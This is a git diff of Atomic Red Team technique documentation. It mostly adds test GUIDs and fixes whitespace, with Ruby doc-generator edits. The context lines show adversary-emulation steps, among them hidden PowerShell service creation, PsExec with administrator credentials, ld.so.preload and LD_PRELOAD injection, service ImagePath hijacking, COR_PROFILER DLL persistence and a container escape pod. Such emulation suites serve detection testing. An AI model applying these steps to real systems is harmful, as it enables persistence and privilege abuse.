 | executable_path | Path of the executable to run. | path | /System/Applications/Calculator.app/Contents/MacOS/Calculator|
 | label_name | Path of the executable to run. | string | evil|
diff --git a/atomics/T1569.002/T1569.002.md b/atomics/T1569.002/T1569.002.md
index be720344..7ecc1ec7 100644
--- a/atomics/T1569.002/T1569.002.md
+++ b/atomics/T1569.002/T1569.002.md
@@ -23,10 +23,14 @@ Upon successful execution, cmd.exe create a new service using sc.exe create that
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2382dee2-a75f-49aa-9378-f52df6ed3fb1
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | service_name | Name of service to create | string | ARTService|
 | executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:&#92;art-marker.txt|
@@ -62,10 +66,14 @@ Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a re
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 873106b7-cfed-454b-8680-fa9f6400431c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_host | Remote hostname or IP address | string | localhost|
 | user_name | Username | String | DOMAIN&#92;Administrator|
@@ -87,7 +95,7 @@ Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a re
 ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} 
+if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1571/T1571.md b/atomics/T1571/T1571.md
index 2cb01cc2..3549804a 100644
--- a/atomics/T1571/T1571.md
+++ b/atomics/T1571/T1571.md
@@ -18,10 +18,14 @@ port check will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 21fe622f-8e53-4b31-ba83-6d333c2583f4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | port | Specify uncommon port number | String | 8081|
 | domain | Specify target hostname | String | google.com|
@@ -48,10 +52,14 @@ Testing uncommonly used port utilizing telnet.
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 5db21e1d-dd9c-4a50-b885-b1e748912767
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | port | Specify uncommon port number | String | 8081|
 | domain | Specify target hostname | String | google.com|
diff --git a/atomics/T1573/T1573.md b/atomics/T1573/T1573.md
index ae595366..ce3ca961 100644
--- a/atomics/T1573/T1573.md
+++ b/atomics/T1573/T1573.md
@@ -20,10 +20,14 @@ Upon successful execution, powershell will make a network connection to 127.0.0.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 21caf58e-87ad-440c-a6b8-3ac259964003
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | server_ip | IP of the external server | String | 127.0.0.1|
 | server_port | The port to connect to on the external server | String | 443|
diff --git a/atomics/T1574.001/T1574.001.md b/atomics/T1574.001/T1574.001.md
index beaef109..10700bb9 100644
--- a/atomics/T1574.001/T1574.001.md
+++ b/atomics/T1574.001/T1574.001.md
@@ -24,6 +24,10 @@ Upon successful execution, powershell.exe will be copied and renamed to updater.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3
+
+
+
 
 
 
diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md
index a5c25e44..74667b1d 100644
--- a/atomics/T1574.002/T1574.002.md
+++ b/atomics/T1574.002/T1574.002.md
@@ -18,10 +18,14 @@ Upon execution, calc.exe will be opened.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 65526037-7079-44a9-bda1-2cb624838040
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | process_name | Name of the created process | string | calculator.exe|
 | gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | path | PathToAtomicsFolder&#92;T1574.002&#92;bin&#92;GUP.exe|
@@ -45,7 +49,7 @@ taskkill /F /IM #{process_name} >nul 2>&1
 ##### Description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{gup_executable}) {exit 0} else {exit 1} 
+if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1574.006/T1574.006.md b/atomics/T1574.006/T1574.006.md
index 8d8a9ab8..45fef5aa 100644
--- a/atomics/T1574.006/T1574.006.md
+++ b/atomics/T1574.006/T1574.006.md
@@ -25,10 +25,14 @@ Upon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.pr
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 39cb0e67-dd0d-4b74-a74b-c072db7ae991
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | path_to_shared_library_source | Path to a shared library source code | Path | PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c|
 | path_to_shared_library | Path to a shared library object | Path | /tmp/T1574006.so|
@@ -52,7 +56,7 @@ sudo sed -i '\~#{path_to_shared_library}~d' /etc/ld.so.preload
 ##### Description: The shared library must exist on disk at specified location (#{path_to_shared_library})
 ##### Check Prereq Commands:
 ```bash
-if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; 
+if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -73,10 +77,14 @@ Upon successful execution, bash will utilize LD_PRELOAD to load the shared objec
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** bc219ff7-789f-4d51-9142-ecae3397deae
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | path_to_shared_library_source | Path to a shared library source code | Path | PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c|
 | path_to_shared_library | Path to a shared library object | Path | /tmp/T1574006.so|
@@ -96,7 +104,7 @@ LD_PRELOAD=#{path_to_shared_library} ls
 ##### Description: The shared library must exist on disk at specified location (#{path_to_shared_library})
 ##### Check Prereq Commands:
 ```bash
-if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; 
+if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
diff --git a/atomics/T1574.009/T1574.009.md b/atomics/T1574.009/T1574.009.md
index 88973d56..b32b1035 100644
--- a/atomics/T1574.009/T1574.009.md
+++ b/atomics/T1574.009/T1574.009.md
@@ -21,10 +21,14 @@ In this case, if an executable program.exe in C:\ exists, C:\program.exe will be
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2770dea7-c50f-457b-84c4-c40a47460d9f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | service_executable | Path of the executable used for the service and as the hijacked program.exe | path | PathToAtomicsFolder&#92;T1574.009&#92;bin&#92;WindowsServiceExample.exe|
 
diff --git a/atomics/T1574.011/T1574.011.md b/atomics/T1574.011/T1574.011.md
index f07dc900..821ed917 100644
--- a/atomics/T1574.011/T1574.011.md
+++ b/atomics/T1574.011/T1574.011.md
@@ -22,10 +22,14 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePa
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f7536d63-7fd4-466f-89da-7e48d550752a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | weak_service_name | weak service check | String | weakservicename|
 
@@ -52,10 +56,14 @@ Change Service registry ImagePath of a bengin service to a malicious file
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f38e9eea-e1d7-4ba6-b716-584791963827
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | weak_service_name | weak service name | String | calcservice|
 | weak_service_path | weak service path | String | %windir%&#92;system32&#92;win32calc.exe|
@@ -80,7 +88,7 @@ sc.exe delete #{weak_service_name}
 ##### Description: The service must exist (#{weak_service_name})
 ##### Check Prereq Commands:
 ```powershell
-if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} 
+if (Get-Service #{weak_service_name}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1574.012/T1574.012.md b/atomics/T1574.012/T1574.012.md
index b84c5d66..693d673f 100644
--- a/atomics/T1574.012/T1574.012.md
+++ b/atomics/T1574.012/T1574.012.md
@@ -29,10 +29,14 @@ Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1574.012&#92;bin&#92;T1574.012x64.dll|
 | clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
@@ -65,7 +69,7 @@ Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -Er
 ##### Description: #{file_name} must be present
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1} 
+if (Test-Path #{file_name}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -90,10 +94,14 @@ Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f373b482-48c8-4ce4-85ed-d40c8b3f7310
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1574.012&#92;bin&#92;T1574.012x64.dll|
 | clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
@@ -122,7 +130,7 @@ Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manage
 ##### Description: #{file_name} must be present
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1} 
+if (Test-Path #{file_name}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -144,10 +152,14 @@ Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 79d57242-bbef-41db-b301-9d01d9f6e817
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_name | unamanged profiler DLL | Path | PathToAtomicsFolder&#92;T1574.012&#92;bin&#92;T1574.012x64.dll|
 | clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
@@ -176,7 +188,7 @@ $env:COR_PROFILER_PATH = ''
 ##### Description: #{file_name} must be present
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1} 
+if (Test-Path #{file_name}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1609/T1609.md b/atomics/T1609/T1609.md
index 801cec20..e3aaf7bd 100644
--- a/atomics/T1609/T1609.md
+++ b/atomics/T1609/T1609.md
@@ -17,10 +17,14 @@ Attackers who have permissions, can run malicious commands in containers in the
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** d03bfcd3-ed87-49c8-8880-44bb772dea4b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | namespace | K8s namespace to use | String | default|
 | command | Command to run | String | uname|
diff --git a/atomics/T1610/T1610.md b/atomics/T1610/T1610.md
index 32a1c397..6b91bb16 100644
--- a/atomics/T1610/T1610.md
+++ b/atomics/T1610/T1610.md
@@ -21,6 +21,10 @@ Additional Details:
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 58004e22-022c-4c51-b4a8-2b85ac5c596b
+
+
+
 
 
 
@@ -42,7 +46,7 @@ kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
 ##### Description: Verify docker is installed.
 ##### Check Prereq Commands:
 ```sh
-which docker 
+which docker
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -51,7 +55,7 @@ if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt
 ##### Description: Verify docker service is running.
 ##### Check Prereq Commands:
 ```sh
-sudo systemctl status docker 
+sudo systemctl status docker
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -60,7 +64,7 @@ sudo systemctl start docker
 ##### Description: Verify kind is in the path.
 ##### Check Prereq Commands:
 ```sh
-which kind 
+which kind
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -71,7 +75,7 @@ mv kind /usr/bin/kind
 ##### Description: Verify kind-atomic-cluster is created
 ##### Check Prereq Commands:
 ```sh
-sudo kind get clusters 
+sudo kind get clusters
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -80,7 +84,7 @@ sudo kind create cluster --name atomic-cluster
 ##### Description: Verify kubectl is in path
 ##### Check Prereq Commands:
 ```sh
-which kubectl 
+which kubectl
 ```
 ##### Get Prereq Commands:
 ```sh
diff --git a/atomics/T1611/T1611.md b/atomics/T1611/T1611.md
index 44fbe47a..910e11e7 100644
--- a/atomics/T1611/T1611.md
+++ b/atomics/T1611/T1611.md
@@ -21,6 +21,10 @@ Additional Details:
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 0b2f9520-a17a-4671-9dba-3bd034099fff
+
+
+
 
 
 
@@ -42,7 +46,7 @@ kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
 ##### Description: Verify docker is installed.
 ##### Check Prereq Commands:
 ```sh
-which docker 
+which docker
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -51,7 +55,7 @@ if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt
 ##### Description: Verify docker service is running.
 ##### Check Prereq Commands:
 ```sh
-sudo systemctl status docker 
+sudo systemctl status docker
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -60,7 +64,7 @@ sudo systemctl start docker
 ##### Description: Verify kind is in the path.
 ##### Check Prereq Commands:
 ```sh
-which kind 
+which kind
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -71,7 +75,7 @@ mv kind /usr/bin/kind
 ##### Description: Verify kind-atomic-cluster is created
 ##### Check Prereq Commands:
 ```sh
-sudo kind get clusters 
+sudo kind get clusters
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -80,7 +84,7 @@ sudo kind create cluster --name atomic-cluster
 ##### Description: Verify kubectl is in path
 ##### Check Prereq Commands:
 ```sh
-which kubectl 
+which kubectl
 ```
 ##### Get Prereq Commands:
 ```sh
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index e9c19f64..b94da380 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -709,3 +709,20 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319
 c33f3d80-5f04-419b-a13a-854d1cbdbf3a
 126f71af-e1c9-405c-94ef-26a47b16c102
 da4f751a-020b-40d7-b9ff-d433b7799803
+c35ac4a8-19de-43af-b9f8-755da7e89c89
+002cca30-4778-4891-878a-aaffcfa502fa
+42f22b00-0242-4afc-a61b-0da05041f9cc
+c89becbe-1758-4e7d-a0f4-97d2188a23e3
+8fd5a296-6772-4766-9991-ff4e92af7240
+7e91138a-8e74-456d-a007-973d67a0bb80
+437b2003-a20d-4ed8-834c-4964f24eec63
+4f08197a-2a8a-472d-9589-cd2895ef22ad
+d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
+812c3ab8-94b0-4698-a9bf-9420af23ce24
+afedc8c4-038c-4d82-b3e5-623a95f8a612
+c99a829f-0bb8-4187-b2c6-d47d1df74cab
+b4988cad-6ed2-434d-ace5-ea2670782129
+8822c3b0-d9f9-4daf-a043-491160a31122
+8822c3b0-d9f9-4daf-a043-49f110a31122
+8d1c2368-b503-40c9-9057-8e42f21c58ad
+649349c7-9abf-493b-a7a2-b1aa4d141528
diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb
index 83ee3678..3e4e0078 100755
--- a/bin/generate-atomic-docs.rb
+++ b/bin/generate-atomic-docs.rb
@@ -63,7 +63,6 @@ class AtomicRedTeamDocs
   def generate_technique_docs!(atomic_yaml, output_doc_path)
     technique = ATTACK_API.technique_info(atomic_yaml.fetch('attack_technique'))
     technique['identifier'] = atomic_yaml.fetch('attack_technique').upcase
-
     template = ERB.new File.read("#{ATOMIC_RED_TEAM_DIR}/atomic_doc_template.md.erb"), nil, "-"
     generated_doc = template.result(binding)
 
@@ -135,7 +134,7 @@ class AtomicRedTeamDocs
     puts "Generated Atomic Red Team index at #{output_doc_path}"
   end
 
-  
+
   #
   # Generates a master Markdown index of ATT&CK Tactic -> Technique -> Atomic Tests
   #
@@ -213,12 +212,14 @@ class AtomicRedTeamDocs
         technique = {
           "techniqueID" => atomic_yaml['attack_technique'],
           "score" => 100,
-          "enabled" => true
+          "enabled" => true,
+          "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md"
         }
         techniqueParent =  {
           "techniqueID" => atomic_yaml['attack_technique'].split('.')[0],
           "score" => 100,
-          "enabled" => true
+          "enabled" => true,
+          "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md"
         }
 
         techniques.push(technique)
@@ -231,16 +232,16 @@ class AtomicRedTeamDocs
           if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /macos/} then has_macos_tests = true end
           if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^(?!windows|macos).*$/} then has_linux_tests = true end
         end
-        if has_windows_tests then 
-          techniques_win.push(technique) 
+        if has_windows_tests then
+          techniques_win.push(technique)
           techniques_win.push(techniqueParent) unless techniques_win.include?(techniqueParent)
         end
-        if has_macos_tests then 
-          techniques_mac.push(technique) 
+        if has_macos_tests then
+          techniques_mac.push(technique)
           techniques_mac.push(techniqueParent) unless techniques_mac.include?(techniqueParent)
         end
-        if has_linux_tests then 
-          techniques_lin.push(technique) 
+        if has_linux_tests then
+          techniques_lin.push(technique)
           techniques_lin.push(techniqueParent) unless techniques_lin.include?(techniqueParent)
         end
       end